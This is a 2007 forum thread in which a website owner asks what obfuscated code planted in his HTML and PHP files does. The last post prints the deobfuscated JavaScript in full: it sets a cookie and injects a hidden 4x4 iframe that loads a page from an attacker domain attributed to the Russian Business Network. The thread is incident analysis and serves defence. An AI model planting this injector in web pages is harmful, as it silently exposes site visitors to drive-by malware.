Security Forums
What Does This Hack Do?

Forum: Computer Forensics and Incident Response
mrconsumer (joined 24 Jul 2007)
Posted: Tue Jul 24, 2007 8:15 pm    Post subject: What Does This Hack Do?

Three of my websites were compromised last week, and the following code (or variations of it) was added as the last line of every HTM and PHP file in the root directory.



Can anyone tell me what this does or how to decipher it? (I can provide a text file with this for anyone interested.)

Thanks,
MrConsumer
Advocate (joined 31 Aug 2006, Amsterdam, NL)
Posted: Mon Jul 30, 2007 11:20 am

It looks like obfuscated javascript to be honest...

I haven't got time to confirm what it does at the moment but maybe someone else can have a shot. Additionally you could attempt to run it in an isolated virtual environment and have a look!

icujc (joined 21 Apr 2005)
Posted: Tue Jul 31, 2007 4:37 am

Trying to type this from your image file is insane... A text document would be a lot easier to copy and paste, but maybe this will help: http://scriptasylum.com/tutorials/encdec/encode-decode.html
mrconsumer (joined 24 Jul 2007)
Posted: Tue Jul 31, 2007 1:29 pm

I will be happy to provide a text file of the offending code via email. I didn't want to create a situation where this thing could harm someone viewing it, so I turned it into a .gif.

Also, Sophos has analyzed the file, and is adding it to their virus list (but I still don't know what it purportedly would do):

http://www.sophos.com/security/analyses/trojpintadda.html

Edgar
lrebrown (joined 08 Dec 2005, UK)
Posted: Tue Jul 31, 2007 4:58 pm

You don't need to worry about harming anyone viewing it. When posting your message the HTML (e.g. the <script> tag) will either be stripped from your post, or characters like < and > will be encoded to make them harmless (they will display as text on the page rather than being parsed as HTML tags).

It's perfectly safe to post it here, so long as the forum is protected against XSS attacks (which it most certainly will be).
mrconsumer (joined 24 Jul 2007)
Posted: Wed Aug 01, 2007 1:38 pm

I uploaded a zipped copy of the actual text here:
http://www.mrconsumer.com/hack.zip

Thanks,

Edgar
The_Real_Gandalf, Trusted SF Member (joined 14 Apr 2004, Athens, Greece)
Posted: Tue Sep 25, 2007 10:25 am

It looks like incomplete source code for a virus ID string. I do not think that it is fully functional, but the best way to test it is to "install/run" it on an isolated machine with all services running (e.g. WWW, IIS, etc.).

Gandalf
jumperinthedoor (joined 30 Oct 2007)
Posted: Wed Oct 31, 2007 11:52 pm

It is obfuscated JavaScript. It does function and sets an iframe to 24.update1.classictel.org/html/. This is a site belonging to the Russian Business Network. I tried to wget the 24.update1.classictel.org/html/ to see what malware it was hosting but I can't get there because we block it here. Anyway, here is the unobfuscated script:

// Sets a cookie <name>=<value> that expires 24 hours later; used to mark
// a visitor who has already been served the iframe.
function fp(yR,qd){
var jM=new Date();
var Jr=new Date();
Jr.setTime(jM.getTime()+86400000);
document.cookie = yR+"="+escape(qd)+"; expires="+Jr.toGMTString();
}

var qh='s1fTc',pG='1';                       // marker cookie name and value
var oX='update1.classictel.org',Lt='/html/'; // attacker-controlled domain and path

// Only fire once per visitor per day: skip if the marker cookie is already set.
if(document.cookie.indexOf(qh+'='+pG)==-1){
// Builds http://<compromised host>.<24 pseudo-random hex chars>.update1.classictel.org/html/
// so the compromised site's own hostname becomes a subdomain of the attacker's.
var FD='http://'+(document.location.host != ''?'':RC())+document.location.host.replace(/[^a-z0-9.-]/,'.').replace(/\.+/,'.')+'.'+RC()+'.'+oX+Lt;
var ft=document.createElement('iframe');
ft.setAttribute('src',FD);ft.frameBorder=0; ft.width=4;
ft.height=4;                                 // 4x4 px frame, effectively invisible
try {
document.body.appendChild(ft);
fp(qh,pG);
}
catch(e){
// If <body> does not exist yet (script ran before it was parsed), create one and retry.
document.write('<html><body></body></html>');
document.body.appendChild(ft); fp(qh,pG);
}
}

// Returns a 24-character pseudo-random label drawn from "01234567890abcdef".
function RC(){
var KO=24,FR="01234567890abcdef";
var na="";
for(BC=0; BC < KO; BC++) na+= FR.substr(Math.floor(Math.random()*FR.length),1,1);
return na;
}

Update: The site 24.update1.classictel.org/html/ redirects to another site that was taken down by the hosting provider.